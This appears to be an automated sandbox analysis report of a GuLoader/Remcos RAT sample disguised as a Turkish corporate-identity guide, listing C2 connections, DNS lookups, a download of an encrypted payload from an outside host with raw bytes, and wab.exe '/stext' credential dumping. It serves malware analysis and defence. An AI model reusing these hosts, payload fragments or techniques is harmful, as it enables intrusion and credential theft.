                                                                                                                                              Oct 27, 2023 16:27:27.360083103 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:27:27.361124992 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:27:27.654911041 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:27:57.389647007 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:27:57.390675068 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:27:57.686422110 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:28:27.422204018 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:28:27.423635960 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:28:27.717519045 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 27, 2023 16:20:24.562052965 CEST5667853192.168.11.201.1.1.1
                                                                                                                                              Oct 27, 2023 16:20:25.513169050 CEST53566781.1.1.1192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:29.717396021 CEST6348853192.168.11.201.1.1.1
                                                                                                                                              Oct 27, 2023 16:20:29.888958931 CEST53634881.1.1.1192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:30.682872057 CEST5767053192.168.11.201.1.1.1
                                                                                                                                              Oct 27, 2023 16:20:30.814414024 CEST53576701.1.1.1192.168.11.20
                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Oct 27, 2023 16:20:24.562052965 CEST192.168.11.201.1.1.10xc567Standard query (0)gudanidevelopment.geA (IP address)IN (0x0001)false
                                                                                                                                              Oct 27, 2023 16:20:29.717396021 CEST192.168.11.201.1.1.10x4da8Standard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 27, 2023 16:20:30.682872057 CEST192.168.11.201.1.1.10xf866Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Oct 27, 2023 16:20:25.513169050 CEST1.1.1.1192.168.11.200xc567No error (0)gudanidevelopment.ge217.147.225.69A (IP address)IN (0x0001)false
                                                                                                                                              Oct 27, 2023 16:20:29.888958931 CEST1.1.1.1192.168.11.200x4da8Name error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 27, 2023 16:20:30.814414024 CEST1.1.1.1192.168.11.200xf866No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                              • gudanidevelopment.ge
                                                                                                                                              • geoplugin.net
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.11.2049745217.147.225.6980C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Oct 27, 2023 16:20:25.826419115 CEST14OUTGET /IogvoayYhe139.bin HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                              Host: gudanidevelopment.ge
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Oct 27, 2023 16:20:26.132560015 CEST16INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 27 Oct 2023 14:20:25 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Content-Length: 494656
                                                                                                                                              Cache-Control: s-maxage=10
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Data Raw: 58 bc 9a 79 03 af 7f af 05 ca 76 8e 7b aa 66 c3 7b 56 3a 03 c8 ff 2a 61 e6 69 58 3a c9 e6 54 f5 ab f0 61 e6 74 59 53 7f c4 22 b6 05 f3 13 de 2b f3 df 32 a6 1d 7c 4f 02 49 39 5d 98 f1 78 4d 31 6a 70 23 2f a7 76 a0 17 65 98 e4 ed 74 81 9b 8f d0 af dd 9a eb 62 67 78 eb 6f d5 6c 87 c1 d6 b4 02 69 2a 73 04 45 b3 35 c5 95 40 72 44 ec 4c 49 a6 ec 5d 73 34 b8 37 e9 a1 88 ae ba 71 be b0 de 83 34 1a 3e 2c c7 69 eb c5 73 c6 bd 21 d5 65 08 5a 98 c8 83 7f 96 84 d7 f5 02 ff ff a9 49 94 fa 3e 18 bb 3f 4c e9 45 a0 c8 7b aa cb 70 7a c8 8a 15 09 5b 14 46 33 81 5f 8f 05 dc 68 7d 0a c8 68 68 42 e2 e3 ca 70 26 3b 0b 4e 49 d2 86 5f 01 b8 4b 72 ef 27 b1 ca 49 02 ef df a0 29 fb 90 60 3f 81 32 52 19 5e 77 4a 55 8e cf ad e0 22 8f a2 6d ce 89 d1 22 1f b5 88 dc 8d ff 42 8f d8 04 b0 d3 e8 13 bc 63 b7 b2 cf 72 e5 8a ac 7c 65 ab 97 c1 a0 64 b4 8f 21 05 52 74 d2 87 f8 94 ad 1f 94 46 3c f5 3a be 76 07 2c 59 c2 1a 5d d0 86 83 d6 8d 97 bd 98 f6 ff bc 29 c3 99 9d 1d 31 31 ea 9a c9 21 2f 7c 0a b9 40 5d b6 13 fe 06 4d 06 46 df 34 46 5f 02 db 3c 19 8b ee e0 41 50 bf c9 aa 41 04 40 33 e1 23 bb f9 d7 85 5c 9c 6f 28 26 f9 30 0d e2 ca 65 58 df 25 51 32 0d 34 33 7c 80 6e 89 46 d6 39 ea 7f 59 cb 4d 46 cc 87 c2 32 70 21 bf 10 9c fa 1c d4 5f 90 32 9e fa fd c4 02 07 36 bf a3 e0 aa 29 79 57 0b cf b6 fd 2b e4 6e 8f d6 9e 6e 07 f6 44 90 7f 2f 3c ee 3e 41 ca 5a 41 b4 b7 dc 61 56 8f 54 e3 a8 a6 9c 9a dc 0a 66 66 49 af 18 61 34 87 a5 00 cd f3 73 40 dd 9b 13 11 73 4b f2 17 23 bf 78 d4 f5 6b 18 6d 4f 7d 4e 9e e3 3e dc 0d a8 32 84 6d d8 98 05 25 a4 58 55 83 b9 61 5f 67 86 55 59 ed fa 80 62 86 36 b3 71 6c 02 00 d1 78 42 0a 59 55 74 3e fd 19 98 5f 44 be d3 51 c6 e2 5f e0 69 34 a7 96 11 10 01 e9 b1 1a 78 b3 f8 02 36 3b 5f 20 80 44 af 0f 9a 3c c0 94 27 91 93 1e 15 ed 77 50 d4 90 79 e8 13 96 cd a1 32 72 51 7b bb b2 5c b3 b6 f8 df e9 6e 11 7b dc 3e 4e 39 ad 4f e4 21 0c 1e e5 37 64 95 ff bc 49 eb 98 aa e5 07 31 58 98 c0 76 61 36 17 69 54 21 73 84 ce 14 3d 3a e0 ac 76 8b 98 4f 3b 60 e8 c1 bc 5e c3 11 6b 04 16 69 27 bd 31 43 97 e7 a2 17 c2 d9 db 79 0c b9 d5 9b 49 4a 32 83 80 77 b0 a1 dd 73 3d 02 14 c4 89 c9 52 1e 4c 92 70 3d d5 50 bd ea 79 cc 5a 19 05 89 ee c0 b2 ca fe a1 d7 dc dc 1c f4 d4 79 ac a8 9b cc f0 51 51 e4 3d 2b 8d 04 e3 ac 83 1e f8 77 9c 3f f8 5f 34 d2 82 2a e2 08 b8 b0 e0 88 4d 42 48 0b 26 69 94 ee 87 f5 f3 bc c4 8e 6b 34 5f 27 b6 d4 fd 49 9c 9c e8 33 25 e7 ba 57 e4 c6 83 bb 03 6c 67 07 1c 7d 63 63 ce 3a ac 24 83 99 ed db 79 8d fb c5 6b f2 e5 4c 60 43 0c 55 56 0c 93 96 ac 0b ea 37 01 cf 22 5f ef c0 b4 85 25 3c 27 10 19 35 c0 32 f0 1a 08 28 17 71 76 be 81 2c 0b 04 b2 f9 55 18 e2 7d 9a 9b a0 3f 7b eb ad 83 d5 30 b9 cf a9 6f 03 ec 5c 2a a9 e4 af e5 41 cf 36 c9 53 36 cb a4 e6 64 dc de 76 0f 0d ae 30 2c 6b 21 14 96 2c 8c 82 78 eb 51 b3 3c ab cb 14 e5 08 14 6c f5 ac 61 82 54 48 bf f5 d7 4c 4e 21 19 9d 21 bd 17 0d 11 80 e9 fd 89 d8 80 77 a0 ae 08 44 a0 6e a4 c8 3a c2 6d ab 7a 48 e0 48 46 2a 8a 2f fa b2 e9 20 a0 5d 96 2f 23 fa df cb 07 83 93 0e ce 6e 33 73 47 30 7b 76 0c 7a 5f 24 42 90 84 32 08 5e 36 d3 63 7b 38 e8 a5 ce d5 cc c6 de f9 ab e1 58 14 e3 c2 40 c2 03 6e 56 18 f1 4c a5 63 22 83 0c 36 d8 2f 97 03 29 d5 b6 a0 b0 13 6e 03 2e c1 aa ff ec 9a 4e 8c 4b 53 ed 26
                                                                                                                                              Data Ascii: Xyv{f{V:*aiX:TatYS"+2|OI9]xM1jp#/vetbgxoli*sE5@rDLI]s47q4>,is!eZI>?LE{pz[F3_h}hhBp&;NI_Kr'I)`?2R^wJU"m"Bcr|ed!RtF<:v,Y])11!/|@]MF4F_<APA@3#\o(&0eX%Q243|nF9YMF2p!_26)yW+nnD/<>AZAaVTffIa4s@sK#xkmO}N>2m%XUa_gUYb6qlxBYUt>_DQ_i4x6;_ D<'wPy2rQ{\n{>N9O!7dI1Xva6iT!s=:vO;`^ki'1CyIJ2ws=RLp=PyZyQQ=+w?_4*MBH&ik4_'I3%Wlg}cc:$ykL`CUV7"_%<'52(qv,U}?{0o\*A6S6dv0,k!,xQ<laTHLN!!wDn:mzHHF*/ ]/#n3sG0{vz_$B2^6c{8X@nVLc"6/)n.NKS&
                                                                                                                                              Oct 27, 2023 16:20:26.132677078 CEST17INData Raw: 66 ae eb 59 4a ae a6 0b c8 e5 25 6c 01 5c b6 b4 b9 c5 30 10 4f 66 1a e6 84 cd c9 64 04 7e 68 d6 37 22 e2 ee 16 5d 77 1c 22 b5 2b 54 42 c3 ee 1a 1c cc db fc 1e 91 93 e9 53 1e 52 29 57 a0 10 57 ea d9 9f cf 0c 58 c3 46 c0 e7 cf 11 ec ba cf ca 98 e0
                                                                                                                                              Data Ascii: fYJ%l\0Ofd~h7"]w"+TBSR)WWXFSXyb4MZq>0+ye$sE#149QYUEo9&0(nWI_z)v2#_2D<2L@ai9h2<}{$0a"_R:1q:+
                                                                                                                                              Oct 27, 2023 16:20:26.132775068 CEST18INData Raw: d5 2c 18 85 9d 47 4d 26 b0 ad 5c 08 7b dc 48 64 db 98 5c e6 cc c5 d5 c6 b9 89 9f 56 85 55 00 2e 92 27 e2 17 e5 5d c5 45 01 00 88 c3 f9 bd d9 50 74 d6 55 28 9b 5f 1d 7d 6a 81 e7 a5 cf 0d 91 f4 a0 96 79 ab 81 ac b1 f2 ea 82 fb 02 6f f8 93 ec 4c 88
                                                                                                                                              Data Ascii: ,GM&\{Hd\VU.']EPtU(_}jyoLcVX]_+(P)^VV]_1<*U_=iR;-j[=\||+,p)6!k3k*PU(,x6uS$)SNy*pI>M$$va8A""o_<X/
                                                                                                                                              Oct 27, 2023 16:20:26.132859945 CEST20INData Raw: f4 53 a9 bf a8 2e b4 60 17 2d 48 59 92 f8 bf 94 2d 3d ec 3f ee 65 8b 8c 07 55 ed af 5b 90 ea 80 47 85 31 f5 b6 99 5e b1 cb 20 5f 77 e6 66 81 2f af 76 91 86 4d fc b4 44 25 2c b3 35 90 30 e9 80 eb 84 05 03 4f 26 48 af f7 ca d0 54 0c 2e 02 25 af c9
                                                                                                                                              Data Ascii: S.`-HY-=?eU[G1^ _wf/vMD%,50O&HT.%F6{8CxM)1d|[m9^PrAxR)Z!QG/0vn7h`<Cl45#h}]sP4`1&3<(bpbL9,Kc/i
                                                                                                                                              Oct 27, 2023 16:20:26.132927895 CEST21INData Raw: 1c 34 f9 6a 6c d1 16 f1 ac 20 0c aa c3 86 2e f9 bb 54 21 04 24 1e fb 48 8c 9b 89 6d 5b 21 d0 3d d9 c5 00 60 57 ce df 8a 6e 63 79 81 7d 32 7a 02 6f 97 f6 c2 32 b5 e7 03 cd 7b b6 51 c2 9e 80 6b 94 92 46 fc f3 94 ce b8 7e 91 94 50 9e c1 9e 26 7b 5c
                                                                                                                                              Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
                                                                                                                                              Oct 27, 2023 16:20:26.133009911 CEST22INData Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
                                                                                                                                              Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
                                                                                                                                              Oct 27, 2023 16:20:26.133081913 CEST24INData Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
                                                                                                                                              Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
                                                                                                                                              Oct 27, 2023 16:20:26.133150101 CEST25INData Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
                                                                                                                                              Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
                                                                                                                                              Oct 27, 2023 16:20:26.133223057 CEST27INData Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
                                                                                                                                              Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
                                                                                                                                              Oct 27, 2023 16:20:26.133289099 CEST28INData Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
                                                                                                                                              Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
                                                                                                                                              Oct 27, 2023 16:20:26.437109947 CEST29INData Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
                                                                                                                                              Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              1192.168.11.2049748178.237.33.5080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Oct 27, 2023 16:20:31.063523054 CEST539OUTGET /json.gp HTTP/1.1
                                                                                                                                              Host: geoplugin.net
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Oct 27, 2023 16:20:31.314343929 CEST545INHTTP/1.1 200 OK
                                                                                                                                              date: Fri, 27 Oct 2023 14:20:31 GMT
                                                                                                                                              server: Apache/2.4.52 (Ubuntu)
                                                                                                                                              content-length: 958
                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 32 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                              Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:16:20:03
                                                                                                                                              Start date:27/10/2023
                                                                                                                                              Path:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:740'313 bytes
                                                                                                                                              MD5 hash:F6CBF303899397B7D28E19930D48627D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1125447769.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1126111595.000000000555D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:1
                                                                                                                                              Start time:16:20:12
                                                                                                                                              Start date:27/10/2023
                                                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              Imagebase:0xee0000
                                                                                                                                              File size:516'608 bytes
                                                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:16:20:31
                                                                                                                                              Start date:27/10/2023
                                                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\edvlu
                                                                                                                                              Imagebase:0xee0000
                                                                                                                                              File size:516'608 bytes
                                                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:16:20:31
                                                                                                                                              Start date:27/10/2023
                                                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\pxbdutmxl
                                                                                                                                              Imagebase:0xee0000
                                                                                                                                              File size:516'608 bytes
                                                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:16:20:31
                                                                                                                                              Start date:27/10/2023
                                                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rrgwvlxrzapp
                                                                                                                                              Imagebase:0xee0000
                                                                                                                                              File size:516'608 bytes
                                                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:16:21:25
                                                                                                                                              Start date:27/10/2023
                                                                                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                              Imagebase:0x7ff651860000
                                                                                                                                              File size:19'776 bytes
                                                                                                                                              MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:21.4%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:19.7%
                                                                                                                                                Total number of Nodes:1548
                                                                                                                                                Total number of Limit Nodes:40
